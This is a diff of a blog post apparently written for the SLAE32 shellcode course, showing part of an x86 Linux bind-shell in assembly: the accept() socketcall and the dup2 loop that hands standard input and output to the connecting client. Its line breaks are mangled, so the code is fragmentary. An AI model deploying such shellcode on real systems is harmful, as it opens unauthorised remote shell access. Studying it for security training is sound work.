boku7/boku7.github.io/_posts/2019-09-15-SLAE32_1_BindShell.md

 mov ecx, esp     ; Point ECX to the top of the stack. int 0x80         ; Executes listen().
 Allowing us to handle incoming TCP-IP Connections.

-; 4.
-Accept incoming connection on Socket and create a new, connected socket for client.
+; 5.
+Accept the incoming connections, on the TCP-IP Socket, and create a new connected session.
-; <socketcall>   clientSocket = accept( ipv4Socket, NULL, NULL ); ;   EAX=0x66
+; <socketcall>   clientSocket = accept( ipv4Socket, NULL, NULL );
-EBX     ECX[0]    ECX[1] ECX[2] xor eax, eax     ; This sets the EAX Register
+;EAX=0x66                        EBX     ECX[0]    ECX[1] ECX[2]
-to NULL (all zeros).  mov al, 0x66     ; EAX is now 0x00000066 = SYSCALL 102 -
-socketcall xor ebx, ebx     ; This sets the EBX Register to NULL (all zeros). mov bl, 0x5      ; EBX is set to accept().  xor ecx, ecx     ; This sets the ECX Register to NULL (all zeros).  push ecx         ; ECX[2].
+xor eax, eax     ; This sets the EAX Register to NULL (all zeros). mov al, 0x66     ; EAX is now 0x00000066 = SYSCALL 102 - socketcall xor ebx, ebx     ; This sets the EBX Register to NULL (all zeros). mov bl, 0x5      ; EBX is set to accept(). xor ecx, ecx     ; This sets the ECX Register to NULL (all zeros). push ecx         ; ECX[2].
 Push the value 0x0 to the stack. push ecx         ; ECX[1].
 Push the value 0x0 to the stack. push esi         ; ECX[0].
 This is the value we saved from creating the Socket earlier. mov ecx, esp     ; Point ECX to the top of the stack. int 0x80         ; System Call Interrupt 0x80 - Executes accept().
 Allowing us to create connected Sockets. xchg ebx, eax    ; The created clientSocket is stored in EAX after receiving a successful connection.

 ; 5.
-Duplicate STDIN, STDOUT, STDERR to the connected Socket.  ;  dup2(
+Transfer STDIN, STDOUT, STDERR to the connected Socket.
-clientSocket, 0 ); // STDIN ;  dup2( clientSocket, 1 ); // STDOUT ;  dup2(
+; dup2( clientSocket, 0 ); // STDIN
+; dup2( clientSocket, 1 ); // STDOUT
-clientSocket, 2 ); // STDERR ;  EAX       EBX      ECX     xor eax, eax   ;
+; dup2( clientSocket, 2 ); // STDERR
+; EAX       EBX      ECX
-This sets the EAX Register to NULL (all zeros).  xor ecx, ecx   ; This sets the ECX Register to NULL (all zeros).  mov cl, 0x2    ; This sets the loop counter, and
+xor eax, eax   ; This sets the EAX Register to NULL (all zeros). xor ecx, ecx   ; This sets the ECX Register to NULL (all zeros). mov cl, 0x2    ; This sets the loop counter, and
                ;  will also be the value of "int newfd" for the 3 dup2 SYSCAL's.
 dup2Loop:      ; Procedure label for the dup2 Loop.
 mov al, 0x3f   ; EAX is now 0x0000003F = SYSCALL 63 - dup2